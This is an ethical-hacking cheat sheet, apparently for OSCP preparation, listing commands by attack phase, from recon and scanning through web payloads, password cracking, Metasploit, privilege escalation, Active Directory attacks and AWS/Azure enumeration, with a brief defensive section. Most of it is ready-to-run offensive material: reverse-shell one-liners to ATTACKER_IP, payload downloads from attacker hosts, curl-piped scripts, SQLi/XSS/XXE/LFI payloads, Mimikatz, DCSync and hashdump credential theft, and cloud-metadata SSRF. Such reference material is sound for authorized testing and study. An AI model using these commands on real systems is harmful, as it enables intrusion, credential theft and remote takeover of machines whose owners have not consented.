Ethical Hacking Cheat Sheet

🔍 Passive Recon (OSINT)

WHOIS Lookup

whois target.com

DNS Enumeration

dig any target.com host -a target.com

Subdomain Discovery

sublist3r -d target.com amass enum -d target.com

Google Dorking

site:target.com filetype:pdf intitle:"index of" site:target.com inurl:admin site:target.com

Shodan / Censys

hostname:target.com

Search for exposed services, certs, banners

Email Harvesting

theHarvester -d target.com -b all

🌐 Active Recon

Ping Sweep

nmap -sn 192.168.1.0/24

Traceroute

traceroute target.com nmap --traceroute target.com

Zone Transfer (if misconfigured)

dig axfr @ns1.target.com target.com

Banner Grabbing

nc -v target.com 80 curl -I https://target.com

Tech Stack Fingerprinting

whatweb target.com wafw00f target.com

Also use Wappalyzer browser extension

📡 Nmap Essentials

Quick Port Scan

nmap -T4 -F target.com

Full Port Scan

nmap -p- -T4 target.com

Service & Version Detection

nmap -sV -sC target.com

OS Detection

nmap -O target.com

Aggressive Scan (all)

nmap -A -T4 target.com

Stealth SYN Scan

nmap -sS target.com

UDP Scan

nmap -sU --top-ports 200 target.com

Vuln Scripts

nmap --script vuln target.com nmap --script smb-vuln* -p 445 target

Save Output

nmap -oA scan_output target.com

📂 Service Enumeration

SMB (port 445)

enum4linux -a target smbclient -L \\\\target crackmapexec smb target

FTP (port 21)

ftp target # try anonymous login

SSH (port 22)

ssh-audit target

SNMP (port 161)

snmpwalk -c public -v1 target

LDAP (port 389)

ldapsearch -x -h target -b "dc=domain,dc=com"

RPC

rpcclient -U "" target

MySQL (port 3306)

mysql -h target -u root -p

🕸️ Web Recon & Fuzzing

Directory Bruteforce

gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt feroxbuster -u http://target.com

Subdomain Fuzzing

ffuf -w wordlist.txt -u http://FUZZ.target.com

Parameter Fuzzing

ffuf -w params.txt -u "http://target.com/page?FUZZ=val"

Nikto Web Scanner

nikto -h http://target.com

Spider / Crawl

gospider -s http://target.com -o output

💉 Web Vulnerabilities (OWASP Top 10)

SQL Injection

' OR 1=1 -- sqlmap -u "http://target/page?id=1" --dbs

XSS — Basic Test

<script>alert(1)</script> "><img src=x onerror=alert(1)>

LFI / Path Traversal

?file=../../../../etc/passwd ?file=....//....//etc/passwd

SSRF

?url=http://127.0.0.1:80 ?url=http://169.254.169.254/latest/meta-data/

Command Injection

; ls -la | whoami `id`

XXE Injection

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

Burp Suite Workflow

Intercept → Modify → Repeat → Intruder for fuzzing → Scanner for automation

🔑 Password Attacks

Wordlist Bruteforce — Hydra

hydra -l admin -P rockyou.txt ssh://target hydra -l admin -P rockyou.txt target http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"

Hash Cracking — Hashcat

hashcat -m 0 hash.txt rockyou.txt hashcat -m 1000 ntlm.txt rockyou.txt

-m 0=MD5, 100=SHA1, 1000=NTLM, 1800=SHA-512

John the Ripper

john --wordlist=rockyou.txt hashes.txt john --show hashes.txt

Default Credentials

Try admin:admin, admin:password, root:root, admin:<blank>

Check defaultpassword.us or cirt.net

🎯 Metasploit Framework

Launch & Search

msfconsole search eternalblue search type:exploit platform:windows

Use & Configure

use exploit/windows/smb/ms17_010_eternalblue show options set RHOSTS 192.168.1.100 set LHOST 192.168.1.10

Payloads

set payload windows/x64/meterpreter/reverse_tcp show payloads

Run

run exploit -j # background job

🐚 Reverse Shells

Listener (Attacker)

nc -lvnp 4444

Bash

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Python

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

PHP

php -r '$sock=fsockopen("IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/bash ATTACKER_IP 4444

PowerShell (Windows)

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',4444)"

Upgrade to Full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm

msfvenom Payloads

msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe

🔺 Privilege Escalation — Linux

System Info

uname -a && id && whoami cat /etc/os-release

SUID Binaries

find / -perm -4000 -type f 2>/dev/null

Check GTFOBins for exploitation paths

Sudo Rights

sudo -l

Cron Jobs

cat /etc/crontab ls -la /etc/cron.*

Writable Files

find / -writable -type f 2>/dev/null | grep -v proc

Automated: LinPEAS

curl -sL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Kernel Exploits

uname -r # check kernel version

Search CVEs — DirtyPipe (5.8–5.16), Dirty COW, PwnKit (pkexec)

File Transfer (wget/curl)

wget http://ATTACKER_IP/file -O /tmp/file curl http://ATTACKER_IP/file -o /tmp/file

🪟 Privilege Escalation — Windows

System Info

whoami /priv systeminfo net localgroup administrators

Running Services

sc query state= all tasklist /SVC

Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\\Windows"

Automated: WinPEAS

.\winPEAS.exe

Token Impersonation (Meterpreter)

use incognito list_tokens -u impersonate_token "DOMAIN\\Administrator"

Pass the Hash

pth-winexe -U admin%HASH //target cmd

File Transfer (PowerShell)

powershell -c "Invoke-WebRequest -Uri http://ATTACKER/file -OutFile C:\tmp\file" certutil -urlcache -split -f http://ATTACKER/file file.exe

📊 Meterpreter Cheat Sheet

System

sysinfo getuid getsystem

Files

download /etc/shadow . upload shell.exe C:\\temp\\ search -f *.txt

Persistence

run persistence -h

Pivoting

run autoroute -s 10.10.10.0/24 portfwd add -l 3389 -p 3389 -r 10.10.10.5

Dump Creds

hashdump run post/multi/recon/local_exploit_suggester

🔗 Network & Pivoting

Port Forwarding — SSH

ssh -L 8080:target:80 user@jump ssh -D 1080 user@jump # SOCKS proxy

Chisel — Server (attacker)

chisel server -p 8000 --reverse

Chisel — Client (victim)

chisel client ATTACKER:8000 R:1080:socks

ProxyChains

proxychains nmap -sT -p80,443 internal_target

Packet Capture

tcpdump -i eth0 -w capture.pcap wireshark capture.pcap

ARP Spoofing (MITM)

arpspoof -i eth0 -t victim gateway bettercap -iface eth0

📶 Wireless (WiFi)

Monitor Mode

airmon-ng start wlan0

Capture Handshakes

airodump-ng wlan0mon airodump-ng -c 6 --bssid AA:BB:CC:DD -w capture wlan0mon

Deauth Attack

aireplay-ng -0 5 -a BSSID wlan0mon

Crack WPA2

aircrack-ng -w rockyou.txt capture.cap

WPS Attack

reaver -i wlan0mon -b BSSID -vv

🏰 AD Enumeration

BloodHound — Collection

bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c All SharpHound.exe -c All --zipfilename bh_out.zip

PowerView Enumeration

Get-NetDomain Get-NetUser | select samaccountname Get-NetGroup "Domain Admins" -FullData Find-LocalAdminAccess

CrackMapExec — AD

crackmapexec smb DC_IP -u user -p pass --users crackmapexec smb DC_IP -u user -p pass --shares crackmapexec smb 192.168.1.0/24 -u user -p pass

LDAP Enumeration

ldapsearch -x -H ldap://DC_IP -b "dc=domain,dc=local" "(objectClass=user)"

⚔️ AD Attacks

Kerberoasting

impacket-GetUserSPNs domain.local/user:pass -dc-ip DC_IP -request Invoke-Kerberoast -OutputFormat Hashcat | fl

Crack with: hashcat -m 13100 hashes.txt rockyou.txt

AS-REP Roasting

impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip DC_IP -format hashcat

Targets accounts with "Do not require Kerberos preauthentication"

Pass the Ticket

impacket-ticketer -nthash HASH -domain-sid SID -domain domain.local Administrator export KRB5CCNAME=Administrator.ccache impacket-psexec domain.local/Administrator@target -k -no-pass

DCSync (Domain Admin required)

impacket-secretsdump domain.local/admin:pass@DC_IP Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'

Lateral Movement — Impacket

impacket-psexec domain/user:pass@target impacket-wmiexec domain/user:pass@target impacket-smbexec domain/user:pass@target

Mimikatz (on Windows)

privilege::debug sekurlsa::logonpasswords lsadump::sam

☁️ AWS Enumeration

Configure & Identify

aws configure aws sts get-caller-identity

IAM Enumeration

aws iam get-user aws iam list-users aws iam list-attached-user-policies --user-name USER

S3 Bucket Enumeration

aws s3 ls aws s3 ls s3://bucket-name --no-sign-request aws s3 cp s3://bucket-name/file . --no-sign-request

EC2 Enumeration

aws ec2 describe-instances aws ec2 describe-security-groups

EC2 Metadata SSRF

http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/

Retrieve temp credentials → configure AWS CLI → enumerate as that role

Automated — Pacu / ScoutSuite

pacu # AWS exploitation framework scout suite --provider aws # multi-cloud auditing

🔷 Azure Enumeration

Login & Identity

az login az account show az ad signed-in-user show

Users & Groups

az ad user list --output table az ad group list --output table az ad group member list --group "Global Administrators"

Resources & VMs

az resource list --output table az vm list --output table az storage account list --output table

Automated — ROADtools / MicroBurst

roadrecon gather # Azure AD recon Invoke-EnumerateAzureBlobs -Base target # MicroBurst

🎓 OSCP Exam Tips

Methodology Order

1. Enumerate everything before exploiting anything

2. Always check for low-hanging fruit: default creds, anonymous login, outdated software

3. If stuck → re-enumerate, check other ports/services

4. Document every step — screenshots + commands

Searchsploit — Find Exploits

searchsploit apache 2.4 searchsploit -m 42966 # copy exploit to current dir searchsploit --update

Port Knocking

knock target 1234 5678 9012 for port in 1234 5678 9012; do nmap -Pn --host-timeout 201 --max-retries 0 -p $port target; done

File Transfer — Python Server

python3 -m http.server 8080 python3 -m uploadserver # supports POST uploads

Compile Exploit for Target

gcc exploit.c -o exploit -m32 # 32-bit gcc exploit.c -o exploit # 64-bit cross-compile: i686-linux-gnu-gcc exploit.c -o exploit

Check for Password Reuse

Always try found credentials on all services: SSH, FTP, SMB, RDP, web panels

📋 Quick Wins Checklist

Initial Access Checklist

☐ Anonymous FTP / SMB access

☐ Default credentials on web apps / services

☐ Outdated software (check version → searchsploit)

☐ Exposed .git / .env / backup files

☐ SQLi / LFI on web app parameters

☐ Writable shares with executable files

Post-Shell Checklist

☐ sudo -l (any NOPASSWD entries?)

☐ SUID binaries → GTFOBins

☐ Cron jobs running as root

☐ Writable /etc/passwd or /etc/shadow

☐ World-writable scripts run by root

☐ Credentials in config files / history

cat ~/.bash_history grep -r "password" /etc/ 2>/dev/null find / -name "*.conf" -readable 2>/dev/null | xargs grep -l "pass" 2>/dev/null

🛡️ Key Defensive Concepts

Hardening Checklist

• Disable unused services & ports

• Patch OS and software regularly

• Enforce least-privilege access

• Enable MFA everywhere possible

• Use WAF, IDS/IPS, and SIEM

Log Analysis

tail -f /var/log/auth.log grep "Failed password" /var/log/auth.log

Check Listening Ports

ss -tulpn netstat -ano # Windows

Find Persistence

crontab -l && ls /etc/cron* reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

📚 Essential Tools & Resources

Distros

Kali Linux Parrot OS BlackArch

Practice Platforms

HackTheBox TryHackMe VulnHub PentesterLab

Reference Sites

GTFOBins — Linux binary escapes

LOLBAS — Windows binary escapes

PayloadsAllTheThings — GitHub

HackTricks — Comprehensive guide

CVE Details — CVE database

Certifications Path

CompTIA Security+ → eJPT → CEH → OSCP → CRTO

Wordlists

ls /usr/share/wordlists/

rockyou.txt, SecLists (GitHub), dirbuster lists

🗺️ Pentest Methodology Quick Reference

① Recon

OSINT, DNS, WHOIS, Shodan, Google Dorks

② Scanning

Nmap, service detection, OS fingerprinting

③ Web

SQLi, XSS, LFI, SSRF, fuzzing, Burp Suite

④ Exploitation

Metasploit, manual exploits, password attacks

⑤ Post-Exploit

Privesc, persistence, lateral movement

⑥ AD

BloodHound, Kerberoasting, DCSync, Mimikatz

⑦ Cloud

AWS IAM, S3, metadata SSRF, Azure AD

⑧ Report

CVSS ratings, remediation, executive summary